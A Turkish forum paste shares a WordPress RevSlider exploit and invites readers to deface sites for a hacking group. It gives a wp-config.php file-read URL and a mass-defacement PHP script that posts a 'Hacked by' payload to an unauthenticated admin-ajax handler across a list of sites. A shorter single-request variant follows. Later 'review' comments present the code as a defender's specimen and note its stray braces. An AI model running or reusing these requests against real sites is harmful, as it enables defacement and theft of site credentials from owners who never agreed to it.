KingSkrupellos

WordPress RevSlider Get Caption CSS Exploit

Dec 8th, 2017
  1. Yazar => KingSkrupellos - Cyberizm Digital Security Team
  2.  
  3. Selamün Aleyküm Cyberizm Ailesi. Birkaç günden beri zone-h.org'da Index PHP, YunusIncredibl,Islamic State,Holako,Lunatico gibi hackerların kastığı açığı paylaşıcam. Cyberizm için elinizden geleni arkanıza koymayın.
  4.  
  5. Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
  6.  
  7. Açığın Kaynaklandığı Yerler =>
  8.  
  9. [code]/wp-content/plugins/revslider/revslider_admin.php[/code]
  10.  
  11. [code]/revslider_admin.php[/code]
  12.  
  13. [code]HEDEFSITE/wp-admin/admin-ajax.php[/code]
  14.  
  15. [code]HEDEFSITE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[/code]
  16.  
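  17. Açık doğrudan şu kodlardan kaynaklanıyor: istekle gelen client_action ve data değerleri alınıyor ve aşağıda gösterilen satırlarda, update_captions_css dalına girilmeden önce herhangi bir yetki ya da nonce kontrolü görünmüyor.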
  18.  
  19. [code]232. $action = self::getPostGetVar("client_action");
  20. 233. $data = self::getPostGetVar("data");
  21. ...
  22. 301. case "get_captions_css":
  23. 302. $contentCSS = $operations->getCaptionsContent();
  24. 303. self::ajaxResponseData($contentCSS);
  25. ...
  26. 305. case "update_captions_css":
  27. 306. $arrCaptions = $operations->updateCaptionsContentData($data);
  28. 307. self::ajaxResponseSuccess("CSS file saved
  29. succesfully!",array("arrCaptions"=>$arrCaptions))[/code]
  30.  
  31. Hacklediğiniz Yeri Görmek için =>
  32. [code]/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css[/code]
  33.  
  34. Eğer Exploiti Doğru yaptıysanız yukarıdaki linkten ctrl + a'ya bastığınız zaman
  35.  
  36. [code]{"success":true,"message":"","data":"[/code]
  37.  
  38. böyle yazıyorsa exploit çalışmış demektir ve yazınız ekranda gözükecektir.
  39. İşte O Exploit =>
  40.  
  41. [hide][code]<?php
      // NOTE(review): specimen of a bulk defacement script, documented for defenders and
      // left unmodified. As pasted it is not balanced PHP (see the stray braces near the
      // end), so read it as a description of the request pattern, not as runnable code.
  42. echo "\n+-------------------------------------------+\n";
  43. echo "| Cyberizm Digital Security Army |\n";
  44. echo "| http://www.cyberizm.org/ |\n";
  45. echo "+-------------------------------------------+\n";
  46.  
      // Reads the list of sites from the file named by the first CLI argument and splits
      // it on CRLF; '@' hides any read error.
  47. $gv=@file_get_contents($argv[1]);
  48. $exv=explode("\r\n",$gv);
  49. echo "\n\t Total site loaded : ".count($exv)."\n\n";
  50. foreach($exv as $url){
  51. echo "\n[+]Scaning : $url \n";
  52. dr($url);
  53. }
      // dr($site): sends one POST to $site's admin-ajax.php and then re-reads the caption
      // CSS over GET. No cookie value, nonce or credential is set anywhere in this
      // listing, i.e. the handler is reached without authentication.
  54. function dr($site){
  55. $ch = curl_init();
      // Log/WAF indicator: POST /wp-admin/admin-ajax.php with
      // action=revslider_ajax_action and client_action=update_captions_css, where the
      // `data` field carries HTML markup instead of CSS.
  56. curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
  57. curl_setopt($ch, CURLOPT_USERAGENT, $agent);
  58. curl_setopt($ch, CURLOPT_POST, 1);
  59. curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
  60. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  61. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  62. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
  63. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
      // Certificate and host-name verification are switched off for the request.
  64. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  65. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  66. $result = curl_exec($ch);
      // Success test is a case-insensitive search for "true" in the response body
      // (cf. the {"success":true,...} JSON quoted earlier in the paste).
  67. if (eregi('true', $result))
  68.  
      // Confirmation step: a GET with client_action=get_captions_css, then a search of
      // the returned body for the defacement string. For site owners the same GET shows
      // whether the stored caption CSS has been replaced. Mitigation: update the plugin
      // and make sure the AJAX handler enforces a capability and nonce check before the
      // update_captions_css branch runs.
  69. $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
  70. $gett=@file_get_contents($path);
  71. if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
  72. echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
      // Sites that pass the check are appended to finish.txt in the current directory.
  73. $fo = fopen("finish.txt","a+");
  74. $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
  75. fclose($fo);
  76. } else {
  77. echo "| ".$site . " : Not Revslider \n\n";
  78. }
  79. curl_close($ch);
  80.  
  81. }
  82.  
  83. echo "\n[-]Exploit Fail \n\n";
  84. }
  85.  
  86.  
  87.  
  88. }
  89. ?>[/code][/hide]
  90.  
  91.  
  92. Exploitin Daha Kısa Şekli
  93. [hide][code]<?php
      // NOTE(review): single-request variant of the same POST, pointed at localhost and
      // left unmodified. The detection indicator is unchanged: a POST to admin-ajax.php
      // with action=revslider_ajax_action and client_action=update_captions_css.
  94.  
      // Form fields sent with the request; `data` is the value handed to the
      // update_captions_css branch quoted earlier in the paste.
  95. $post = array
  96. (
  97. "action" => "revslider_ajax_action",
  98. "client_action" => "update_captions_css",
  99. "data" => "<marquee>Malicious Code Here</marquee>"
  100. );
  101.  
      // Request setup: redirects followed, fixed Firefox 32 User-Agent string, 5 second
      // connect timeout, TLS peer and host verification disabled.
  102. $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
  103. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  104. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  105. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  106. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  107. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  108. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  109. curl_setopt ($ch, CURLOPT_POST, 1);
  110. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
      // The response body is stored in $data and not inspected afterwards.
  111. $data = curl_exec ($ch);
  112. curl_close ($ch);
  113.  
  114. ?>[/code][/hide]